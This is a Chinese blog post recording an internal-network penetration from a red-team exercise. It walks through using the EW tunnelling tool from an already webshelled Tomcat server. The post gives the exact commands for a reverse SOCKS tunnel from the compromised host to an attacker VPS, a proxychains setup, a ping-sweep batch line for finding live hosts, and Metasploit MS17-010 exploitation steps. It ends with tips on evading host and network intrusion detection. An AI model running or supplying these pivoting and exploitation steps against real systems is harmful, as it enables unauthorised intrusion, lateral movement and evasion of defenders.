不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

EW入侵内网渗透记录

一、前言

最近一周护网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。

二、本文介绍

1.准备工作
2.EW是什么,可以做什么。
3.内网模拟(基础环境及网络拓扑)
4.EW代理实战
6.利用proxychains代理寻找MS17-010。

三、准备工作

1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐
2.EW内网穿透工具,https://github.com/idlefire/ew
3.一台Ubuntu VPS,端口开放10000-65535
4.若干台WINDOWS虚拟机在NAT网络下运行。

四、EW简介

EW是一款四年前开发好的NAT穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透代理服务,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,帮助内网渗透直达网络深处。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。

EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。这里篇幅有限,仅介绍危害最大的rssocks。

同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。

防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files 项目。

五、内网模拟

[backcolor=white]
Kali Linux(Attacker 内网 172.16.33.129)

Ubuntu 16.04.3(Attacker 公网 120.53.123.X)

Windows 7(肉鸡 WEB服务器 172.2.40.129)

Windows 7 SP1(肉鸡内网其他机器 172.2.40.X)[/backcolor]

网络拓扑:Kali Linux是攻击者,Ubuntu是公网上的一台VPS,Windows 7是目标机器无外网IP8080端口通过NAT穿透工具映射到外网提供WEB服务。

六、EW代理实战

数据流向:  黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks

操作在 公网IP主机 和 WEB肉机上进行目的是通过反弹方式创建socks代理。

第一步,在VPS上将Github下回的 EW 项目解压并执行:

./ew_for_linux64 -s rcsocks -l 10801 -e 10241

这句话的意思是,在 120.53.123.X  VPS主机添加转换隧道,其中10801端口供黑客使用,10241 端口供肉鸡通道连接,黑客连接10801,本质是反连VPS的10241端口。

第二步,在WEB主机(172.2.40.129)上执行:

ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241

这句话的意思是,在WEB肉鸡上开启socks5代理服务,具体端口依据VPS端设定,这里的10241仅与VPS通信使用。上传ew到选定的目录。

肉鸡网络环境

肉鸡内网其他机器

工具使用第三步,在KALI上:vim /etc/proxychains.conf

socks5  120.53.123.X 10241

这里用SOCKS5,因为是WIN的主机,还有一个选择–弹到CS,CS代理为SOCKS4。

注意验证SOCKS是否打通

proxychains nmap -sT hosts -p port

七、内网探测

proxy nmap targetIP

慎用扫描,流量动静大、速度慢、不稳定、时间长、容易断 。

NetBIOS、ICMP均可以探测存活主机前者仅探测WIN后者遇到禁ping摸瞎。

还有ARP探测特征比较明显。三者权衡,因此进入陌生环境,首选ICMP。

如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。

cmd命令可保存成bat后执行:for /l %%p in (1,1,254) do ping 172.2.40.%%p -n 1 -w 5 |find “TTL” >./ipcheck.log

也可先执行,arp -a看缓存结果。

注意Socks协议只能下到网络层,ICMP属于链路层无法代理。

因此proxychains ping命令不能正常工作。

验证内网WIN主机是否开启防火墙,

八、MSF漏洞验证

proxychains msfconsole

search 17_010

use 1

set rhost 172.2.40.128

exploit

九、总结

内网中有许多监控设备,有HIDS和NIDS, 其中规避HIDS需对工具免杀,规避NIDS需慎用扫描,避免踩雷。学习上,搭靶场多积累经验,了解安全设备检测原理避免被针对。

文章来源:疯猫网络

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » EW入侵内网渗透记录

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏